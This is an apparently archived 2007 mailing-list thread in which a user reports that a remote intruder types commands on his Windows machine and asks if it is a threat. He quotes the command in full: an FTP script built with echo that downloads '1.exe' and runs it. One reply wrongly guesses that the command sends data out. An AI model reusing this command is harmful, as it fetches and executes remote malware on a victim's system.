If this occurred on my Windows box, I would back up what needs to be backed up
and reload the OS with something useful.  Your machine has clearly been


On Tue, 8 May 2007, Celejar wrote:

On Tue,  8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis <[EMAIL PROTECTED]> wrote:

> Hello,
> Recently I'm repeatedly being pestered by a strange event while surfing the 
> net. My cursor is taken over and the following code is typed:
> %systemroot%\system32\cmd.exe
> cmd /c echo open 22783 >> ik &echo user db database >> ik &echo 
> get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> (I see on my network monitor that this is coming from outside; IP-number and 
> user name vary.)
> After that all is back to normal.
> Now this is of course a nuisance, but is it also a thread? And what can be 
> done against it?
> Anybody got a clue on this?
> Tia,
> Jan Outhuis

Are you running linux or windows? With what program are you surfing?
Where is that text displayed? The cmd.exe line looks like someone
trying to open the windows command shell; the next line looks like
someone trying to capture some data from your system and ftp it
outwards. I'm just guessing, but it does appear to be a threat.

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